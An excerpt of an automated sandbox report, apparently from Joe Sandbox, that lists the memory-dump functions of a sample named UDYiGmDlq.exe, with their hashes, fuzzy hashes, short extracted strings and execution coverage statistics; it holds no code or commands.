Function 0719AE9B Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0cea9c7aa12eb9c5a6d526a30bfe3375b8889ee6bba8fac261ebb01bf812e8c
Instruction ID: e7f0a22d0cbee53313f08a1bd8cdc013c37b858928a6ef457c7acfdf947108e6
Opcode Fuzzy Hash: c0cea9c7aa12eb9c5a6d526a30bfe3375b8889ee6bba8fac261ebb01bf812e8c
Instruction Fuzzy Hash: E6E09AB1C0D685CFCB09CF78D892269BFB1BE42200B08C0ABD0649B266C330141ACB82

Function 0719B059 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 392c238d158757440f4d7f92db335d5fb1cbd71bc2ad77640191f08b66361ba4
Instruction ID: 770babfb325c21846822055fa76c4b7ebd79d8870ca315d12cf5a0ca6a83a325
Opcode Fuzzy Hash: 392c238d158757440f4d7f92db335d5fb1cbd71bc2ad77640191f08b66361ba4
Instruction Fuzzy Hash: E4D05EA4F18108ABDB08EBB1AC5563E26E3BB88721F51D4396842973C4DE3499028AA1

Function 07190DF8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42c5eb64e6ec628c9ab9f903ef09644d1ff121140f72512c1039d6af53a4288c
Instruction ID: 7f9d4cbab9c49b0dc75b09f22b52d5fff1a24d703aabfdb4f2f06375b484eca9
Opcode Fuzzy Hash: 42c5eb64e6ec628c9ab9f903ef09644d1ff121140f72512c1039d6af53a4288c
Instruction Fuzzy Hash: 9FE0E27181460DDE8B81EE78D9045AA7BE8BB09220F00C53AE849AA150EB30D2E8CB81

Function 07196681 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 476976edee2d469f0992383eecc4d91cc2903876a6faedf0d291cb7a640149ad
Instruction ID: bdaa832e3087d05434ce2c017fe004424ed33184d2b6e34b044467d13b886ac6
Opcode Fuzzy Hash: 476976edee2d469f0992383eecc4d91cc2903876a6faedf0d291cb7a640149ad
Instruction Fuzzy Hash: AFD0127501D3D9AFC7271A7478060F37F78694312474604E3E445CD893C61928D582B6

Function 071920D8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fc6604846c749a76cc20447c5ca7a112a1d30d1652d66e6c7a2443547f28a59
Instruction ID: 5ac90b49c5784ec5fca458f40a186728fb767b365a714a43d088c2cc9bc4a156
Opcode Fuzzy Hash: 1fc6604846c749a76cc20447c5ca7a112a1d30d1652d66e6c7a2443547f28a59
Instruction Fuzzy Hash: 95D0A7307043058793047FB7580637933DEEB80612341C034E109C63C5DF38D8018321

Function 0719C0A0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8490b404a25c50eba3c343527ea2337f730683e8dc06141f2f5adf71bf1e4ad
Instruction ID: f0256c8c009eadf65a43dc9c6929e3fb042783c9c5ee2f116b37fc5c5a4cca98
Opcode Fuzzy Hash: d8490b404a25c50eba3c343527ea2337f730683e8dc06141f2f5adf71bf1e4ad
Instruction Fuzzy Hash: 18C012EC63C208CB8CCC9EBC542853D3A9D6B8B200F6B4636818B821C1CB16580305F3

Function 0719A2A8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a99f1b84721092a67b33ca6bbb12fd4cd63f519a05cf04b9dc3487864fe31e0
Instruction ID: bad47530692ed732d2fa16f70a036da49df0bff333398adb60a837513daa0a0a
Opcode Fuzzy Hash: 5a99f1b84721092a67b33ca6bbb12fd4cd63f519a05cf04b9dc3487864fe31e0
Instruction Fuzzy Hash: 4EC08CB205C7C16ECB03537419745A9BF72AF63A0032A88E3D2C8840E3E221443FE323

Function 0719C2EA Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 500865161304688cbd133d7005aa5da0d125b4aeb309198947e81d7f779c89ff
Instruction ID: 317693bc80a783ba243a2ff2de7b37692bd60f65e50a36c376a5d4ef222bac15
Opcode Fuzzy Hash: 500865161304688cbd133d7005aa5da0d125b4aeb309198947e81d7f779c89ff
Instruction Fuzzy Hash: 35C08CE402C28ED68F0C2EF020392F07F182407510F0602B6E4CE288C24B0514D382F3

Function 0719E318 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5fa6a7943a85c9a17a9cdcefd85d28f97d975d58e95939a16211986783e2ca1
Instruction ID: e446de7963c747b4776c376bc4475a1a2c8fbfd30985efec4c2d2f80d8dcc958
Opcode Fuzzy Hash: f5fa6a7943a85c9a17a9cdcefd85d28f97d975d58e95939a16211986783e2ca1
Instruction Fuzzy Hash: DDC08CB10023048BC3246BD8F90E72877687B00302FC40020E208418A09BBC10E5CAA5

Function 0719BCB0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd7c0986e673523fedf5655cffeaa820d9c778db9b41959a8b71a2e82fbca5cc
Instruction ID: 07c111fa80453d22453528460a27eb71fa9d8b80bc4a9de31bbd35b84048f2eb
Opcode Fuzzy Hash: bd7c0986e673523fedf5655cffeaa820d9c778db9b41959a8b71a2e82fbca5cc
Instruction Fuzzy Hash: 2BD012F281C150DFC721CB55ED95C983FF0BE1E300749499AC0054B262D330A412DB44

Function 0719C2F0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 697d8cefcbc4304a76421cfba9e43971ad26431e2fe6ef876bff7638ac6718f6
Instruction ID: bb018a8b0e7182d6446aa36cdc6aa6cf104dc27e713fd8d116597e6a266b4401
Opcode Fuzzy Hash: 697d8cefcbc4304a76421cfba9e43971ad26431e2fe6ef876bff7638ac6718f6
Instruction Fuzzy Hash: 76B092E402C20EC24D0C2EF420292F53A5C2047A10E030132A1CB208C00B09245340F2

Function 0719770C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 191f797d421bd34646033537f5d762dc13c02de05bc77c61ef9ff1be0a723c4b
Instruction ID: 6d8f0b6a779ce90bc81e39045e72e1ddff59b9314074ee39cd53bd87f09754d9
Opcode Fuzzy Hash: 191f797d421bd34646033537f5d762dc13c02de05bc77c61ef9ff1be0a723c4b
Instruction Fuzzy Hash: C8B012F91B8940E3480963A84CC893EA851FFB3700F81CD65334C100E08731882ED317

Function 0719B9C1 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40a5fa3492ef94a67b155b14d4d3139a4008ddf33d431611c2ee129a789030f5
Instruction ID: b45abea135e6367c59cb0bee0d74407c0eb7642ea6cfdcffbf69acbc510d87e2
Opcode Fuzzy Hash: 40a5fa3492ef94a67b155b14d4d3139a4008ddf33d431611c2ee129a789030f5
Instruction Fuzzy Hash: A6C04CF0B78229BFDF358A51FE47D6C77767B15A00F550520A602661D4E76045538640

Function 07196690 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2372389508.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7190000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39525a259647669c18a8d33f5db756fabaf337a288de6af80f0b352ca8c86b6b
Instruction ID: 16bf63ec92f4ab8c0d6f5e7e2fb43b3c060dd15a17bd32c8295904925c04e3c3
Opcode Fuzzy Hash: 39525a259647669c18a8d33f5db756fabaf337a288de6af80f0b352ca8c86b6b
Instruction Fuzzy Hash: 0CA011B002828CEA8A0822A0A00A0BA3B3C2002208B820820E80A080C02B2A38B200A8

Analysis Process: UDYiGmDlq.exePID: 7644, Parent PID: 7312COMMON

Execution Graph

Execution Coverage:	16.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	40%
Total number of Nodes:	15
Total number of Limit Nodes:	1

Executed Functions

Function 01895362 Relevance: 6.4, Strings: 5, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjFp, xrefs: 01895566
0oFp, xrefs: 018953E2
LjFp, xrefs: 01895550
PHcq, xrefs: 018955D9
PHcq, xrefs: 018955C8

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 8638324c9e1751f03efae8e30a1f3567db02f678040e37e5550cc8ac788b2846
Instruction ID: 942e6a71d0674c2f6a5e2aefaf87fb48322cbc5d58896153155172b9880165b8
Opcode Fuzzy Hash: 8638324c9e1751f03efae8e30a1f3567db02f678040e37e5550cc8ac788b2846
Instruction Fuzzy Hash: C191B274E00218CFDB15CFA9D884A9DBBF2BF89310F14C06AE809EB265DB349945CF50

Function 0189C19B Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjFp, xrefs: 0189C38D
PHcq, xrefs: 0189C400
PHcq, xrefs: 0189C3EF
0oFp, xrefs: 0189C20A
LjFp, xrefs: 0189C377

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 30a2eaf0ba9c2cc96b9d84a8babc7ed46d1d3bbb7055ab88f5e1af7d75b2ba11
Instruction ID: e9ccb471200399dea8cedc2588b5f3307d96262665d94ef82ee2a66d76b2c3f0
Opcode Fuzzy Hash: 30a2eaf0ba9c2cc96b9d84a8babc7ed46d1d3bbb7055ab88f5e1af7d75b2ba11
Instruction Fuzzy Hash: 44819F74E00618CFDB54DFAAD984A9DBBB2BF88310F14C06AE419EB365DB359A41CF50

Function 0189C468 Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjFp, xrefs: 0189C647
PHcq, xrefs: 0189C6D0
0oFp, xrefs: 0189C4DA
LjFp, xrefs: 0189C65D
PHcq, xrefs: 0189C6BF

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 88b0208f109ce1601334c8e391ee13d91d728b4d625ab51429e43d4a70f74c75
Instruction ID: bcf6a6f1fb4c3c2b4e86ec427f1102725c7f8e252a25d288db28c66807ca6c53
Opcode Fuzzy Hash: 88b0208f109ce1601334c8e391ee13d91d728b4d625ab51429e43d4a70f74c75
Instruction Fuzzy Hash: A481A174E00218CFDB15DFAAD984A9DBBF2BF88310F14C06AE419EB265DB359941CF50

Function 0189CA08 Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 0189CC70
0oFp, xrefs: 0189CA7A
PHcq, xrefs: 0189CC5F
LjFp, xrefs: 0189CBFD
LjFp, xrefs: 0189CBE7

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 14d4e5f69f4f0826a312ab40cbb65bb660d792198ca15fb157363cdd9847579b
Instruction ID: c89a98efe60584e44d7247334420dcee1abbf3869a4b808f80ee53f0f0b9903b
Opcode Fuzzy Hash: 14d4e5f69f4f0826a312ab40cbb65bb660d792198ca15fb157363cdd9847579b
Instruction Fuzzy Hash: 79818F74E00258CFDB14DFAAD884A9DBBF2BF88314F14C069E819AB365DB359941CF50

Function 0189D278 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 0189D4E0
LjFp, xrefs: 0189D457
PHcq, xrefs: 0189D4CF
0oFp, xrefs: 0189D2EA
LjFp, xrefs: 0189D46D

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 0bf90f645d123918e7ebe5fe5f97e99e3ecf065e9272245c734ebf71b7a323e7
Instruction ID: ad922a55495ac0c4a06cc03ba97bf85de0e006dfef5562145ab7692aad6be330
Opcode Fuzzy Hash: 0bf90f645d123918e7ebe5fe5f97e99e3ecf065e9272245c734ebf71b7a323e7
Instruction Fuzzy Hash: DC819074E00218CFDB14DFAAD984A9DBBF2BF88310F14C169E809AB265DB34A945CF54

Function 0189CCD8 Relevance: 6.4, Strings: 5, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 0189CF2F
LjFp, xrefs: 0189CEB7
PHcq, xrefs: 0189CF40
LjFp, xrefs: 0189CECD
0oFp, xrefs: 0189CD4A

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 7f306f7860147bad2fe8a9cfd59bfcb7edcb288aaf1dbe404ec4f6e63a658868
Instruction ID: 36edd1657a919705f1efab777404611ee5df1f778492601b0f9eb28e4d7e8bb7
Opcode Fuzzy Hash: 7f306f7860147bad2fe8a9cfd59bfcb7edcb288aaf1dbe404ec4f6e63a658868
Instruction Fuzzy Hash: 2181AFB4E00218DFDB14DFAAD984A9DBBF2BF88310F14C069E419AB365DB359981CF51

Function 0189C738 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 0189C98F
LjFp, xrefs: 0189C92D
PHcq, xrefs: 0189C9A0
LjFp, xrefs: 0189C917
0oFp, xrefs: 0189C7AA

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: 02088b9f47b9841da46b24ce934cdb39aa2b7019f541f3822aba5a95ee333078
Instruction ID: 588c6e03fe9e775f42b8bc7c88cdeb763e60159d74044847a9e790143338c8d2
Opcode Fuzzy Hash: 02088b9f47b9841da46b24ce934cdb39aa2b7019f541f3822aba5a95ee333078
Instruction Fuzzy Hash: FE81AE74E00218DFDB14DFAAD984A9DBBF2BF88310F14C06AE819AB365DB359941CF50

Function 0189CFAA Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHcq, xrefs: 0189D1FF
PHcq, xrefs: 0189D210
LjFp, xrefs: 0189D19D
0oFp, xrefs: 0189D01A
LjFp, xrefs: 0189D187

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: 0oFp$LjFp$LjFp$PHcq$PHcq
API String ID: 0-3391486992
Opcode ID: d25899ec6f2916bd91cf521d8acce66deb9ca9b0ea9a1fec639a41f2483db19c
Instruction ID: 014668d399a84741d26a37597dd4b63bc72ac4806a325686f16334b8d2dd99c4
Opcode Fuzzy Hash: d25899ec6f2916bd91cf521d8acce66deb9ca9b0ea9a1fec639a41f2483db19c
Instruction Fuzzy Hash: CC819FB4E00618CFDB14DFAAD984A9DFBF2BF88310F148169E419AB265DB349981CF54

Function 01899DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON

Download Yara Rule

Strings

(ocq, xrefs: 0189A518
4'cq, xrefs: 01899E04
4'cq, xrefs: 0189AB13
4'cq, xrefs: 01899F0C

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: (ocq$4'cq$4'cq$4'cq
API String ID: 0-140906574
Opcode ID: cd055f1afac2fc3a38989f6cb5f1e1032fa7a60ee228a7dad73a5fdad130cb99
Instruction ID: 54b4ccbb3e8da84f3e997cd7ea7cd6564c97124329f205fe9b5cdc99831e213f
Opcode Fuzzy Hash: cd055f1afac2fc3a38989f6cb5f1e1032fa7a60ee228a7dad73a5fdad130cb99
Instruction Fuzzy Hash: 0FA28170A00209DFCF19CF68C984AAEBBF6FF88314F198559E505DB266D734EA81CB51

Function 018929EC Relevance: 5.5, Strings: 4, Instructions: 453
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xgq, xrefs: 01892A9E
Xgq, xrefs: 01892B57
Xgq, xrefs: 01892AD8
Xgq, xrefs: 01892BA4

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: Xgq$Xgq$Xgq$Xgq
API String ID: 0-1951159037
Opcode ID: ea82d0a59b6c841fcdb6e61a28bfd2f8ba3de64f300176ff6e100e41bd791d75
Instruction ID: 6c4737fec01b875231e692050962fa6a88deb57041fad7ac9e39bd0d0696857f
Opcode Fuzzy Hash: ea82d0a59b6c841fcdb6e61a28bfd2f8ba3de64f300176ff6e100e41bd791d75
Instruction Fuzzy Hash: 0BF1DD71906795CFCB628F78C45469ABFF1FF4A318B2844EDC445DB222E7368952CB42

Function 01896FC8 Relevance: 5.4, Strings: 4, Instructions: 448
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,gq, xrefs: 01897298
(ocq, xrefs: 01897220
(ocq, xrefs: 01897212
,gq, xrefs: 0189728A

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: (ocq$(ocq$,gq$,gq
API String ID: 0-2401767512
Opcode ID: 88cf5178ee78f647be3f980bbdc0c8d18dfdb498526f03cc2af176f4cfd5b26e
Instruction ID: 1d00c29a197ad6ad478314fa1b5c81212f3acf8d85520e6f2444e6d728051d43
Opcode Fuzzy Hash: 88cf5178ee78f647be3f980bbdc0c8d18dfdb498526f03cc2af176f4cfd5b26e
Instruction Fuzzy Hash: F1024C70A10219DFDF15CF69C984AAEBBB2BF88304F598069E915EB261D734EE41CF50

Function 06E99548 Relevance: 3.4, APIs: 2, Instructions: 357
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06E995E0

Memory Dump Source

Source File: 00000010.00000002.4729120714.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6e90000_UDYiGmDlq.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36903e7d20425048d44fa1d377fdac65d5a79526fd2c1f4cc4374ea1578a0047
Instruction ID: 5662b87e84689218426fccb3dae910388068d3e0f32ef3feccd0081c1421a31c
Opcode Fuzzy Hash: 36903e7d20425048d44fa1d377fdac65d5a79526fd2c1f4cc4374ea1578a0047
Instruction Fuzzy Hash: 32F1D574D01218CFDB54DFA9C884B9DBBB2BF88304F54D1A9E808AB356DB749985CF50

Function 018969A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON

Download Yara Rule

Strings

(ocq, xrefs: 01896EDA
Hgq, xrefs: 01896DA6

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: (ocq$Hgq
API String ID: 0-2239030825
Opcode ID: 2209cc7637d36d3ac0705b350d93bcc0a54bcde4a3bd879640ff060fa4d60f1f
Instruction ID: 836970a195a360e043a30c26ebcbc2a5cff9058e004e1c007fc650dfccdb93d0
Opcode Fuzzy Hash: 2209cc7637d36d3ac0705b350d93bcc0a54bcde4a3bd879640ff060fa4d60f1f
Instruction Fuzzy Hash: FA129F70A002199FDB14DF69C854AAEBBF6FF88300F248569E515DB395EF349E81CB90

Function 0189E97A Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbfab12097cf093a4a0a7c6f5b156a403a9d9d748abbf79d4f2795d7d34ffc53
Instruction ID: 554c4f732f65ed81cebde003b7c828486d1422c14e0570e3457f0e22fe46c28f
Opcode Fuzzy Hash: cbfab12097cf093a4a0a7c6f5b156a403a9d9d748abbf79d4f2795d7d34ffc53
Instruction Fuzzy Hash: C551B474E00208DFDB18DFAAD984A9DBBB2FF88310F24C129E915AB365DB345941CF50

Function 0189E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 738b79db147985c8d744c6648c3e55780d73e78d8b4faf6dd4c4ca707eb61c6f
Instruction ID: d0a66b2edc9d503bcddfa82b310a08269a0504f06a03e5d444219ee1bc6f5156
Opcode Fuzzy Hash: 738b79db147985c8d744c6648c3e55780d73e78d8b4faf6dd4c4ca707eb61c6f
Instruction Fuzzy Hash: 4851A474E00608DFDB19DFAAD984A9DBBF2FF88300F248129E915AB365DB349941CF54

Function 018976F1 Relevance: 10.5, Strings: 8, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(ocq, xrefs: 0189772E
,gq, xrefs: 01897B90
(ocq, xrefs: 01897815
,gq, xrefs: 01897BA0
(ocq, xrefs: 018978B2
(ocq, xrefs: 01897BFF
(ocq, xrefs: 01897C0F
(ocq, xrefs: 018977E9

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: (ocq$(ocq$(ocq$(ocq$(ocq$(ocq$,gq$,gq
API String ID: 0-3338910979
Opcode ID: 1ca68638ba3197ba39bf55af24951ea7084e28238efbe3c4db873fbba0c47480
Instruction ID: 86552dc181e1e34ba79fa5ce0b12cf45dc7be67193ac02e09cca2c75e310c5ca
Opcode Fuzzy Hash: 1ca68638ba3197ba39bf55af24951ea7084e28238efbe3c4db873fbba0c47480
Instruction Fuzzy Hash: 90123630A106499FCF25CF68C884A9EBBF2EF89314F198599E549DB262D730EE41CF50

Function 01895F38 Relevance: 2.8, Strings: 2, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hgq, xrefs: 01896023
Hgq, xrefs: 01896056

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: Hgq$Hgq
API String ID: 0-3391890871
Opcode ID: 32abcbd1187b1c646df001b58dc2e8765edffa6e82fa0f1cffc6d18a8c4f9045
Instruction ID: 0469bbd6ae4c495d0aa082f5ba516fa3b6e06285ca9d795b5e7e5668494878a9
Opcode Fuzzy Hash: 32abcbd1187b1c646df001b58dc2e8765edffa6e82fa0f1cffc6d18a8c4f9045
Instruction Fuzzy Hash: FF91BF703042559FDF1AAF28C898A6E7BB2BF89300F188569E506CB396DF34CD41C7A1

Function 01896498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON

Download Yara Rule

Strings

,gq, xrefs: 0189656E
,gq, xrefs: 01896578

Memory Dump Source

Source File: 00000010.00000002.4713716668.0000000001890000.00000040.00000800.00020000.00000000.sdmp, Offset: 01890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1890000_UDYiGmDlq.jbxd

Similarity

API ID:
String ID: ,gq$,gq
API String ID: 0-2533611571
Opcode ID: d7e3ed5cad4a574e189ea09f078421671b0074c626d992eb4ae36dfde16ab9fc
Instruction ID: 9109575345454b5bd22e39b85297fe49ccae8f06ccf2ff88ab0e8f87c344df41
